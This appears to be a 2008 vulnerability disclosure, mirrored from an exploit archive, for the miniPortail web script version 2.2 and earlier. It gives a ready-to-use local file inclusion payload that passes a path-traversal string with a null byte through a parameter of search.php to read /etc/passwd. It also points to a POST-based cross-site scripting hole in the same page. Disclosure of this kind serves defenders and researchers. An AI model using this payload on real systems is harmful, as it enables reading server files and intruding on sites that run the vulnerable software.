id: 3942
date: 10/22/2008
title: miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
author: StAkeR
cves: 

===================================================
miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
===================================================


/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR 
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scritping (POST)
   -  search.php (<script>[javascript]</script>)
   
*/



#  0day.today [2023-03-24]  #